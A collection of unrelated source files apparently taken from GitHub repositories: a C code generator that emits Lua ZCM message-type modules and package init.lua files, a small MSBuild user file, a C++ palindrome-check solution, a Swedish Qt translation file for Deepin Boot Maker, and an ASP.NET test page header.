                zcm_dimension_t *dim =
                    (zcm_dimension_t*) g_ptr_array_index (lm->dimensions, n);
                g_string_append_printf (accessor, "[i%d]", n);
                if (dim->mode == ZCM_CONST) {
                    emit (1+n, "for i%d = 1, %s do", n, dim->size);
                } else {
                    emit (1+n, "for i%d = 1, self.%s do", n, dim->size);
                }
            }
            // last dimension.
            zcm_dimension_t *last_dim = (zcm_dimension_t *) g_ptr_array_index(lm->dimensions,
                    lm->dimensions->len - 1);
            int last_dim_fixed_len = last_dim->mode == ZCM_CONST;
            if(zcm_is_primitive_type(lm->type->lctypename) &&
               0 != strcmp(lm->type->lctypename, "string")) {
                // primitive row: pack the whole thing in one call
                _emit_encode_list(zcm, f, ls, lm,
                        accessor->str, 1+n, last_dim->size, last_dim_fixed_len);
            } else {
                // string/struct elements: encode one at a time
                if (last_dim_fixed_len) {
                    emit (1+n, "for i%d = 1, %s do", n, last_dim->size);
                } else {
                    emit (1+n, "for i%d = 1, self.%s do", n, last_dim->size);
                }
                g_string_append_printf (accessor, "[i%d]", n);
                _emit_encode_one (zcm, f, ls, lm, accessor->str, n+2);
                emit (1+n, "end");
            }
            g_string_free (accessor, TRUE);
            // close out the loops opened above
            while ( --n >= 0 ) {
                emit (1+n, "end");
            }
        }
    }
    _flush_write_struct_fmt (f, struct_fmt, struct_members);
    g_queue_free (struct_fmt);
    g_queue_free (struct_members);
    emit(0, "");
    emit(0, "    return table.concat(buf_table)");
    emit(0, "end");
    emit(0, "");
}
static void
emit_lua_encode (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    // Emit the public :encode() method: the 8-byte packed fingerprint
    // followed by the body produced by :_encode_one().
    const char *sn = ls->structname->shortname;
    emit(0, "function %s:encode()", sn);
    emit(0, "");
    emit(0, "    return %s._packed_fingerprint .. self:_encode_one()", sn);
    emit(0, "end");
    emit(0, "");
}
static void
emit_member_initializer(const zcmgen_t* zcm, FILE *f, zcm_member_t* lm,
        int dim_num)
{
    // Recursively finishes the "obj.<member> = " output line started
    // by the caller (via fprintf/emit_start).  `dim_num` is the
    // dimension currently being initialised: past the last one a
    // scalar default is printed (nil_initializer_string); a
    // variable-size dimension becomes an empty table (its length is
    // not known until assignment/decode); a fixed-size dimension emits
    // a for-loop that fills every slot.
    if(dim_num == lm->dimensions->len) {
        emit_end("%s", nil_initializer_string(lm->type));
        return;
    }
    zcm_dimension_t *dim =
        (zcm_dimension_t *) g_ptr_array_index (lm->dimensions, dim_num);
    if(dim->mode == ZCM_VAR) {
        emit_end("{}");
    } else {
        emit_end("{}");
        emit(dim_num + 1, "for d%d = 1, %s do", dim_num, dim->size);
        // rebuild the full accessor ("obj.m[d0][d1]...") for this depth
        emit_start(dim_num + 2, "obj.%s", lm->membername);
        for(int i = 0; i < dim_num + 1; i++){
            emit_continue("[d%d]", i);
        }
        emit_continue(" = ");
        emit_member_initializer(zcm, f, lm, dim_num + 1);
        emit(dim_num + 1, "end");
    }
}
static void
emit_lua_new (const zcmgen_t *zcm, FILE *f, zcm_struct_t *lr)
{
    // Emit the :new() constructor: builds a table with every member
    // set to a type-appropriate default (via emit_member_initializer)
    // and installs the type table as the instance's metatable.
    emit(0, "function %s:new()", lr->structname->shortname);
    emit(0, "");
    emit(0, "    local obj = {}");
    emit(0, "");
    unsigned int member;
    for (member = 0; member < lr->members->len; member++) {
        zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(lr->members, member);
        // start the assignment line; emit_member_initializer finishes it
        fprintf(f, "    obj.%s = ", lm->membername);
        // XXX this might need alot of work because lua doesn't have list comprehension
        emit_member_initializer(zcm, f, lm, 0);
    }
    if (0 != member) emit(0, "");
    emit(0, "    setmetatable(obj, self)");
    emit(0, "");
    emit(0, "    return obj");
    emit(0, "end");
    emit(0, "");
}
static void
emit_lua_fingerprint (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    // Emit _get_hash_recursive() plus the precomputed 8-byte
    // _packed_fingerprint.  The `parents` list guards against infinite
    // recursion through mutually dependent types: a type already on
    // the recursion stack contributes hash 0.
    const char *sn = ls->structname->shortname;
    emit(0, "function %s._get_hash_recursive(parents)", sn);
    emit(0, "");
    emit(0, "    local newparents = {}");
    emit(0, "");
    emit(0, "    for _, v in ipairs(parents) do");
    emit(0, "        if v == %s then return zcm._hash.new('0x0') end", sn);
    emit(0, "        table.insert(newparents, v)");
    emit(0, "    end");
    emit(0, "");
    emit(0, "    table.insert(newparents, %s)", sn);
    emit(0, "");
    emit(0, "    local hash = zcm._hash.new('0x%"PRIx64"')", ls->hash);
    // add all substruct hashes
    for (unsigned int m = 0; m < ls->members->len; m++) {
        zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
        const char *msn = lm->type->shortname;
        if (! zcm_is_primitive_type(lm->type->lctypename)) {
            const char *ghr = "_get_hash_recursive(newparents)";
            // XXX this might need a touch up, not sure about intra-module names
            if (is_same_type(lm->type, ls->structname)) {
                emit(0, "        + %s.%s", msn, ghr);
            } else {
                // cross-type: refer via the require()'d escaped name
                char *variablename = escape_typename_to_variablename(lm->type->lctypename);
                emit(0, "        + %s.%s", variablename, ghr);
                g_free(variablename);
            }
        }
    }
    emit(0, "    hash:rotate(1)");
    emit(0, "");
    emit(0, "    return hash");
    emit(0, "end");
    emit(0, "");
    emit(0, "%s._packed_fingerprint = zcm._pack.pack('>X', %s._get_hash_recursive({}))", sn, sn);
    emit(0, "");
}
static void
emit_lua_dependencies (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    // Emit one `local pkg_type = require('pkg.type')` per distinct
    // non-primitive member type.  Self-references are excluded because
    // the type's own local table is already in scope in the generated
    // module.
    GHashTable *dependencies = g_hash_table_new (g_str_hash, g_str_equal);
    for (unsigned int m=0; m<ls->members->len; m++) {
        zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index (ls->members, m);
        if (! zcm_is_primitive_type (lm->type->lctypename)) {
            if (!g_hash_table_lookup (dependencies, lm->type->lctypename)
                && strcmp(lm->type->lctypename, ls->structname->lctypename)) {
                // keys/values are borrowed from the member's typename
                g_hash_table_insert (dependencies, lm->type->lctypename,
                        lm->type->lctypename);
            }
        }
    }
    GPtrArray *deps = _hash_table_get_vals (dependencies);
    for (int i=0; i<deps->len; i++) {
        const char *package = (char *) g_ptr_array_index (deps, i);
        char *variablename = escape_typename_to_variablename(package);
        emit (0, "local %s = require('%s')", variablename, package);
        g_free(variablename);
    }
    if(deps->len) emit (0, "");
    g_ptr_array_free (deps, TRUE);
    g_hash_table_destroy (dependencies);
}
static void
emit_lua_locals (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    /* Cache the globals the generated module needs as file-local
     * variables at the top of the emitted .lua file. */
    static const char *globals[] = {
        "setmetatable", "ipairs", "table", "string", "unpack",
    };
    for (size_t i = 0; i < sizeof globals / sizeof globals[0]; i++)
        emit(0, "local %s = %s", globals[i], globals[i]);
    emit(0, "");
}
static void
emit_lua_buffer_helper (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    // Emit a small file-local helper class that wraps a Lua string and
    // provides the :read(n) interface the decoder expects, raising an
    // error when a read runs past the end of the buffer.
    emit(0, "-- buffer helper for decoding");
    emit(0, "local _buffer_helper = {}");
    emit(0, "_buffer_helper.__index = _buffer_helper");
    emit(0, "");
    emit(0, "function _buffer_helper:new(data_str)");
    emit(0, "");
    emit(0, "    local obj = {buffer = data_str, index = 1}");
    emit(0, "    setmetatable(obj, self)");
    emit(0, "");
    emit(0, "    return obj");
    emit(0, "end");
    emit(0, "");
    emit(0, "function _buffer_helper:read(n_bytes)");
    emit(0, "");
    emit(0, "    local partial = self.buffer:sub(self.index, self.index + n_bytes - 1)");
    emit(0, "    self.index = self.index + n_bytes");
    emit(0, "");
    emit(0, "    if self.index > #self.buffer + 1 then");
    emit(0, "        error('buffer ran out of bytes')");
    emit(0, "    end");
    emit(0, "");
    emit(0, "    return partial");
    emit(0, "end");
    emit(0, "");
}
// One ZCM package's worth of parsed definitions, grouped by emit_lua()
// before being handed to emit_package().
typedef struct {
    char *name;        // fully-qualified package name, e.g. "pkg.subpkg" (owned)
    GPtrArray *enums;  // zcm_enum_t* in this package (borrowed pointers)
    GPtrArray *structs; // zcm_struct_t* in this package (borrowed pointers)
} _package_contents_t;
static _package_contents_t * _package_contents_new (const char *name)
{
    /* Allocate an empty package record for `name` (name is copied). */
    _package_contents_t *pc = malloc (sizeof *pc);
    pc->name = strdup (name);
    pc->enums = g_ptr_array_new ();
    pc->structs = g_ptr_array_new ();
    return pc;
}
static void _package_contents_free (_package_contents_t *pc)
{
    // Frees the record and its arrays.  The arrays hold borrowed
    // zcm_enum_t*/zcm_struct_t* pointers (added in emit_lua from the
    // zcmgen_t), so only the containers are released here.
    g_ptr_array_free (pc->enums, TRUE);
    g_ptr_array_free (pc->structs, TRUE);
    free (pc->name);
    free (pc);
}
// XXX step 2, basically the main function
// Emits everything for one package: creates the package directory,
// (re)writes the per-level init.lua chain, then writes one
// <Type>.lua module per struct.  Returns 0 on success, -1 on any
// filesystem failure.
static int
emit_package (zcmgen_t *zcm, _package_contents_t *pc)
{
    // create the package directory, if necessary
    char **dirs = g_strsplit (pc->name, ".", 0);
    char *pdname = build_filenamev (dirs);
    char package_dir[PATH_MAX];
    char package_dir_prefix[PATH_MAX];
    int have_package = dirs[0] != NULL;
    sprintf (package_dir_prefix, "%s%s", getopt_get_string(zcm->gopt, "lpath"),
            strlen(getopt_get_string(zcm->gopt, "lpath")) > 0 ?
            G_DIR_SEPARATOR_S : "");
    sprintf(package_dir, "%s%s%s", package_dir_prefix, pdname,
            have_package ? G_DIR_SEPARATOR_S : "");
    free (pdname);
    if (strlen (package_dir)) {
        if (! g_file_test (package_dir, G_FILE_TEST_EXISTS)) {
            // g_mkdir_with_parents (package_dir, 0755);
            mkdir_with_parents (package_dir, 0755);
        }
        if (!g_file_test (package_dir, G_FILE_TEST_IS_DIR)) {
            err ("Could not create directory %s\n", package_dir);
            return -1;
        }
    }
    // write the package init.lua files, if necessary
    FILE *init_lua_fp = NULL;
    GHashTable * initlua_requires = NULL;
    GHashTable * initlua_requires_subpack = NULL;
    if (have_package) {
        int ndirs = 0;
        for (ndirs=0; dirs[ndirs]; ndirs++);
        // walk down the package hierarchy, refreshing one init.lua per
        // level; only the deepest level's handle stays open past the loop
        for (int i=0 ; i<ndirs; i++) {
            // make filename
            char *initlua_fname;
            {
                char *initlua_fname_parts[1024];
                assert(ndirs + 4 < 1024);
                initlua_fname_parts[0] = package_dir_prefix;
                for (int j=0; j<=i; j++) {
                    initlua_fname_parts[j+1] = dirs[j];
                }
                initlua_fname_parts[i+2] = "init.lua";
                initlua_fname_parts[i+3] = NULL;
                initlua_fname = build_filenamev (initlua_fname_parts);
            }
            // make current package name
            char * package_name;
            {
                char * name_parts[1024];
                assert(i < 1024);
                for (int j = 0; j <= i; j++) {
                    name_parts[j] = dirs[j];
                }
                name_parts[i + 1] = NULL;
                package_name = g_strjoinv(".", name_parts);
            }
            // reset the per-level "already required" bookkeeping
            if (initlua_requires) {
                g_hash_table_destroy(initlua_requires);
                initlua_requires = NULL;
            }
            if (initlua_requires_subpack) {
                g_hash_table_destroy(initlua_requires_subpack);
                initlua_requires_subpack = NULL;
            }
            initlua_requires = g_hash_table_new_full(g_str_hash, g_str_equal, g_free, g_free);
            initlua_requires_subpack = g_hash_table_new_full(g_str_hash, g_str_equal, g_free, g_free);
            // if the file already exists, read the contents
            if (g_file_test (initlua_fname, G_FILE_TEST_EXISTS)) {
                init_lua_fp = fopen(initlua_fname, "r");
                if (!init_lua_fp) {
                    perror ("fopen");
                    free (initlua_fname);
                    g_free(package_name);
                    return -1;
                }
                // harvest existing require() lines so other packages'
                // entries survive the rewrite below
                while(!feof(init_lua_fp)) {
                    char buf[4096];
                    memset(buf, 0, sizeof(buf));
                    char *result = fgets(buf, sizeof(buf)-1, init_lua_fp);
                    if(!result)
                        break;
                    // XXX get all of the previous types and packages
                    // this regex works because the first part is greedy
                    GRegex * regex = g_regex_new("require\\('([\\w+\\.]*\\.)(\\w+)'\\)( -- subpackage)?",
                            (GRegexCompileFlags) 0, (GRegexMatchFlags) 0, NULL);
                    GMatchInfo * matchinfo;
                    if(g_regex_match(regex, buf, (GRegexMatchFlags) 0, &matchinfo)){
                        if(g_match_info_get_match_count(matchinfo) == 3){
                            // not a subpackage
                            gchar * classname = g_match_info_fetch(matchinfo, 2);
                            g_hash_table_insert(initlua_requires, g_strdup(classname), g_strdup(classname));
                        }else if(g_match_info_get_match_count(matchinfo) == 4){
                            // this is a subpackage
                            // XXX fprintf(stderr, "> buff: %s\n", buf);
                            gchar * superpackage = g_match_info_fetch(matchinfo, 1);
                            gchar * subpackage = g_match_info_fetch(matchinfo, 2);
                            // XXX fprintf(stderr, "> super: %s, sub: %s\n", superpackage, subpackage);
                            gchar * fullsubpackage = g_strjoin("", superpackage, subpackage, NULL);
                            // XXX fprintf(stderr, "> [2] inserting: %s\n", fullsubpackage);
                            g_hash_table_insert(initlua_requires_subpack, g_strdup(fullsubpackage), g_strdup(fullsubpackage));
                            g_free(fullsubpackage);
                        }
                    }
                    g_match_info_free(matchinfo);
                    g_regex_unref(regex);
                }
                fclose(init_lua_fp);
                init_lua_fp = NULL;
            }
            init_lua_fp = fopen(initlua_fname, "w");
            // XXX fprintf(stderr, "> opened: %s\n", initlua_fname);
            if (!init_lua_fp) {
                perror ("fopen");
                free (initlua_fname);
                g_free(package_name);
                return -1;
            }
#ifndef WIN32
            // lock init.lua for exclusive write access
            // TODO do the equivalent in windows
            struct flock lockinfo;
            lockinfo.l_type = F_WRLCK;
            lockinfo.l_start = 0;
            lockinfo.l_whence = SEEK_SET;
            lockinfo.l_len = 0 ;
            lockinfo.l_pid = getpid();
            if(0 != fcntl(fileno(init_lua_fp), F_SETLKW, &lockinfo)) {
                perror("locking init.lua");
                free(initlua_fname);
                g_free(package_name);
                fclose(init_lua_fp);
                return -1;
            }
#endif
            fprintf (init_lua_fp, "--[[\n"
                    "ZCM package init.lua file\n"
                    "This file automatically generated by zcm-gen.\n"
                    "DO NOT MODIFY BY HAND!!!!\n"
                    "--]]\n"
                    "\n"
                    "local M = {}\n"
                    "\n");
            // add in all previous types
            GList * package_types = g_hash_table_get_values(initlua_requires);
            for (int j = 0; j < g_list_length(package_types); j++) {
                char * tn = (char *) g_list_nth_data(package_types, j);
                char * fn = g_strjoin(".", package_name, tn, NULL);
                fprintf(init_lua_fp, "M.%s = require('%s')\n", tn, fn);
                g_free(fn);
            }
            g_list_free(package_types);
            // add in all previous packages
            GList * subpacks = g_hash_table_get_values(initlua_requires_subpack);
            for (int j = 0; j < g_list_length(subpacks); j++) {
                char * spn = (char *) g_list_nth_data(subpacks, j);
                // get the base of the package name
                char ** tmpsplit = g_strsplit(spn, ".", -1);
                char * sn = tmpsplit[g_strv_length(tmpsplit) - 1];
                // XXX fprintf(stderr, "[1] sn: %s, spn: %s\n", sn, spn);
                fprintf(init_lua_fp, "M.%s = require('%s') -- subpackage\n", sn, spn);
                g_strfreev(tmpsplit);
            }
            g_list_free(subpacks);
            // if the current package has a subpackage (which eventually contains the target package)
            // add a `require` for that subpackage to the current (if it hasn't already)
            if (i + 1 < ndirs) {
                char *subpack_name = g_strjoin(".", package_name, dirs[i + 1], NULL);
                // check for the subpackage name
                if (!g_hash_table_lookup(initlua_requires_subpack, subpack_name)) {
                    // add it if it didn't exist
                    g_hash_table_insert(initlua_requires_subpack, g_strdup(subpack_name), g_strdup(subpack_name));
                    // XXX fprintf(stderr, "[2] sn: %s, spn: %s\n", dirs[i + 1], subpack_name);
                    fprintf(init_lua_fp, "M.%s = require('%s') -- subpackage\n", dirs[i + 1], subpack_name);
                }
                g_free(subpack_name);
            }
            // not yet the target?
            if (i + 1 < ndirs) {
                // close it out
                fprintf(init_lua_fp, "\nreturn M\n\n");
                fclose(init_lua_fp);
                init_lua_fp = NULL;
            }
            free (initlua_fname);
            g_free(package_name);
        }
    }
    g_strfreev (dirs);
    ////////////////////////////////////////////////////////////
    // STRUCTS
    for (int i = 0; i<pc->structs->len; i++) {
        zcm_struct_t *ls = (zcm_struct_t *) g_ptr_array_index(pc->structs, i);
        char path[PATH_MAX];
        sprintf (path, "%s%s.lua", package_dir, ls->structname->shortname);
        if(init_lua_fp){
            // XXX add the 'require' to the appropriate init.lua
            if (!g_hash_table_lookup(initlua_requires, ls->structname->shortname)) {
                fprintf(init_lua_fp, "M.%s = require('%s')\n", ls->structname->shortname, ls->structname->lctypename);
            }
            // XXX look for subpackages
            for (unsigned int m = 0; m < g_ptr_array_size(ls->members); m++) {
                zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
                if(g_str_has_prefix(lm->type->package, pc->name)){
                    // make a regex starting with the current package...
                    gchar ** tmpsplit = g_strsplit(pc->name, ".", 0);
                    gchar * regexpackage = g_strjoinv("\\.", tmpsplit);
                    // only look for immediate submodules, not submodules of the submodules
                    gchar * regexstr = g_strjoin("", "^", regexpackage, "\\.(\\w+)", NULL);
                    GRegex * regex = g_regex_new(regexstr, (GRegexCompileFlags) 0, (GRegexMatchFlags) 0, NULL);
                    GMatchInfo * matchinfo;
                    g_strfreev(tmpsplit);
                    g_free(regexpackage);
                    g_free(regexstr);
                    if (g_regex_match(regex, lm->type->package, (GRegexMatchFlags) 0, &matchinfo)) {
                        if (g_match_info_get_match_count(matchinfo) == 2) {
                            gchar * fullsubpackage = g_match_info_fetch(matchinfo, 0);
                            gchar * subpackage = g_match_info_fetch(matchinfo, 1);
                            // was it already in the file?
                            if (!g_hash_table_lookup(initlua_requires_subpack, fullsubpackage)) {
                                // XXX fprintf(stderr, "> [1] inserting: %s\n", fullsubpackage);
                                g_hash_table_insert(initlua_requires_subpack, g_strdup(fullsubpackage), g_strdup(fullsubpackage));
                                fprintf(init_lua_fp, "M.%s = require('%s') -- subpackage\n", subpackage, fullsubpackage);
                            }
                        }
                    }
                    g_match_info_free(matchinfo);
                    g_regex_unref(regex);
                }
            }
        }
        // skip regeneration when the .lua file is up to date w.r.t. the .zcm
        if (!zcm_needs_generation(zcm, ls->zcmfile, path))
            continue;
        FILE *f = fopen(path, "w");
        if (f==NULL) return -1;
        fprintf(f, "--[[\n"
                "ZCM type definitions\n"
                "This file automatically generated by zcm.\n"
                "DO NOT MODIFY BY HAND!!!!\n"
                "--]]\n"
                "\n"
                "local zcm = require('zcm')\n\n");
        emit_lua_dependencies (zcm, f, ls);
        // XXX added this...
        emit_lua_locals(zcm, f, ls);
        emit_lua_buffer_helper(zcm, f, ls);
        // XXX step 3, start making the object
        emit(0, "local %s = {}", ls->structname->shortname);
        emit(0, "%s.__index = %s", ls->structname->shortname, ls->structname->shortname);
        emit(0, "");
        // CONSTANTS
        for (unsigned int cn = 0; cn < g_ptr_array_size(ls->constants); cn++) {
            zcm_constant_t *lc = (zcm_constant_t *) g_ptr_array_index(ls->constants, cn);
            assert(zcm_is_legal_const_type(lc->lctypename));
            emit(1, "%s.%s = %s", ls->structname->shortname,
                    lc->membername, lc->val_str);
        }
        if (g_ptr_array_size(ls->constants) > 0)
            emit(0, "");
        // NAMES
        emit(0, "%s.name = '%s'", ls->structname->shortname, ls->structname->lctypename);
        emit(0, "%s.packagename = '%s'", ls->structname->shortname, ls->structname->package);
        emit(0, "%s.shortname = '%s'", ls->structname->shortname, ls->structname->shortname);
        emit(0, "");
        emit_lua_new (zcm, f, ls);
        emit_lua_fingerprint (zcm, f, ls);
        emit_lua_encode (zcm, f, ls);
        emit_lua_encode_one (zcm, f, ls);
        emit_lua_decode (zcm, f, ls);
        emit_lua_decode_one (zcm, f, ls);
        emit(0, "return %s", ls->structname->shortname);
        emit(0, "");
        fclose (f);
    }
    if(init_lua_fp){
        fprintf(init_lua_fp, "\nreturn M\n\n");
        fclose(init_lua_fp);
    }
    // NOTE(review): when have_package is false, initlua_requires is
    // still NULL here — confirm g_hash_table_destroy(NULL) is
    // acceptable in this codebase.  Also initlua_requires_subpack is
    // never destroyed after the loop; looks like a leak — verify.
    g_hash_table_destroy(initlua_requires);
    return 0;
}
// XXX step 1, but there's not much to see, then go to emit package
// Lua backend entry point: buckets every parsed enum and struct by
// package, then emits each package's directory of generated .lua
// files.  Returns 0 on success, or the first non-zero emit_package()
// status.
//
// FIX: the per-package loop no longer returns early on failure, so
// `vals` and `packages` are always freed (the original leaked both on
// the error path).
int emit_lua(zcmgen_t *zcm)
{
    // value destroy notify frees each _package_contents_t; keys are
    // the pc->name strings owned by those values
    GHashTable *packages = g_hash_table_new_full (g_str_hash,
            g_str_equal, NULL, (GDestroyNotify)_package_contents_free);

    // group the enums and structs by package
    for (unsigned int i = 0; i < zcm->enums->len; i++) {
        zcm_enum_t *le = (zcm_enum_t *) g_ptr_array_index(zcm->enums, i);
        _package_contents_t *pc = (_package_contents_t *) g_hash_table_lookup (packages,
                le->enumname->package);
        if (!pc) {
            pc = _package_contents_new (le->enumname->package);
            g_hash_table_insert (packages, pc->name, pc);
        }
        g_ptr_array_add (pc->enums, le);
    }

    for (unsigned int i = 0; i < zcm->structs->len; i++) {
        zcm_struct_t *ls = (zcm_struct_t *) g_ptr_array_index(zcm->structs, i);
        _package_contents_t *pc = (_package_contents_t *) g_hash_table_lookup (packages,
                ls->structname->package);
        if (!pc) {
            pc = _package_contents_new (ls->structname->package);
            g_hash_table_insert (packages, pc->name, pc);
        }
        g_ptr_array_add (pc->structs, ls);
    }

    GPtrArray *vals = _hash_table_get_vals (packages);

    // stop at the first failing package, but fall through to cleanup
    int status = 0;
    for (int i = 0; i < vals->len && 0 == status; i++) {
        _package_contents_t *pc = (_package_contents_t *) g_ptr_array_index (vals, i);
        status = emit_package (zcm, pc);
    }

    g_ptr_array_free (vals, TRUE);
    g_hash_table_destroy (packages);
    return status;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<ProjectView>ShowAllFiles</ProjectView>
</PropertyGroup>
</Project> | {
"pile_set_name": "Github"
} |
// Valid Palindrome
class Solution {
public:
    // Returns true if s reads the same forwards and backwards when only
    // alphanumeric characters are considered and case is ignored.  A string
    // containing no alphanumerics (including "") counts as a palindrome.
    bool isPalindrome(string s) {
        // Compact the string in place, keeping only lower-cased
        // alphanumerics.  Each char is cast to unsigned char first: passing
        // a negative char to the <cctype> functions is undefined behavior
        // (CERT STR37-C) on platforms where char is signed.
        size_t len = 0;
        for (size_t i = 0; i < s.size(); i++) {
            unsigned char c = static_cast<unsigned char>(s[i]);
            if (isalnum(c))
                s[len++] = static_cast<char>(tolower(c));
        }
        // Two-pointer scan over the compacted prefix [0, len).
        for (size_t lo = 0, hi = len; lo + 1 < hi; lo++, hi--) {
            if (s[lo] != s[hi - 1])
                return false;
        }
        return true;
    }
};
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.1" language="sv">
<context>
<name>BMHandler</name>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="67"/>
<source>Disk Format Error: Please format the disk with FAT32</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="65"/>
<source>Failed to call the command 1%</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="69"/>
<source>Insufficient Disk Space: Ensure the disk has 1% free space</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="71"/>
<source>Disk Mount Error: Insert the disk again or reboot to retry</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="73"/>
<source>Image Decompression Error: Verify md5 checksum of the image to ensure its integrity</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="75"/>
<source>Internal Error</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>BMWindow</name>
<message>
<source>Deepin Boot Maker</source>
<translation type="vanished">Deepin Boot Skapare</translation>
</message>
<message>
<location filename="../app/bmwindow.cpp" line="121"/>
<source>Boot Maker is a simple tool to write system image files into CD/DVD, USB flash drive and other media.</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/bmwindow.cpp" line="123"/>
<source>Boot Maker</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>ISOSelectView</name>
<message>
<location filename="../app/view/isoselectview.cpp" line="144"/>
<source>OR</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="88"/>
<location filename="../app/view/isoselectview.cpp" line="163"/>
<source>Select an ISO image file</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="124"/>
<source>Drag an ISO image file here</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="214"/>
<source>Next</source>
<translation>Nästa</translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="238"/>
<source>Illegal ISO image file</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="301"/>
<source>Reselect an ISO image file</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="442"/>
<source>Detecting ISO file, please wait...</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>ProgressView</name>
<message>
<location filename="../app/view/progressview.cpp" line="61"/>
<source>Burning</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/progressview.cpp" line="77"/>
<source>Burning, please wait...</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/progressview.cpp" line="89"/>
<source>Do not remove the disk or shut down the computer during the process</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/progressview.cpp" line="111"/>
<source>Cancel</source>
<translation>Avbryt</translation>
</message>
</context>
<context>
<name>QObject</name>
<message>
<location filename="../libdbm/util/deviceinfo.h" line="40"/>
<source>Removable Disk</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/util/utils.cpp" line="115"/>
<source>Removable disk</source>
<translation>Löstagbar hårddisk</translation>
</message>
<message>
<source>Deepin Boot Maker</source>
<translation type="vanished">Deepin Boot Skapare</translation>
</message>
<message>
<location filename="../app/main.cpp" line="123"/>
<source>Boot Maker</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>ResultView</name>
<message>
<location filename="../app/view/resultview.cpp" line="148"/>
<source>Reboot now</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="131"/>
<source>Done</source>
<translation>Klar</translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="65"/>
<source>Successful</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="228"/>
<source>The error log will be uploaded automatically with the feedback. We cannot improve without your feedback</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="229"/>
<source>Submit Feedback</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="239"/>
<source>After-Sale Services</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="255"/>
<source>Close</source>
<translation>Stäng</translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="263"/>
<source>Sorry, process failed</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="264"/>
<source>Process failed</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>UnmountUsbView</name>
<message>
<location filename="../app/view/unmountusbview.cpp" line="13"/>
<source>Verifying data and safely removing the media, please wait...</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>UsbSelectView</name>
<message>
<location filename="../app/view/usbselectview.cpp" line="332"/>
<source>Format USB flash drive</source>
<translation>Formatera USB-minne</translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="87"/>
<source>Select a disk</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="114"/>
<source>Format the disk to increase the burning success rate</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="163"/>
<source>No disk available</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="183"/>
<source>Start</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="251"/>
<source>Formatting will erase all data on the disk, please confirm and continue</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="334"/>
<source>Formatting the disk will overwrite all data, please have a backup before proceeding.</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="335"/>
<source>Cancel</source>
<translation>Avbryt</translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="336"/>
<source>OK</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="351"/>
<source>Disk Format Error: Please format the disk with FAT32</source>
<translation type="unfinished"></translation>
</message>
<message>
<source>Ok</source>
<translation type="vanished">Okej</translation>
</message>
</context>
</TS>
| {
"pile_set_name": "Github"
} |
<%@ Register TagPrefix="cc1" Namespace="GHTWebControls" Assembly="MainsoftWebApp" %>
<%@ Page Language="c#" AutoEventWireup="false" Codebehind="WebControl_Enabled.aspx.cs" Inherits="GHTTests.System_Web_dll.System_Web_UI_WebControls.WebControl_Enabled" %>
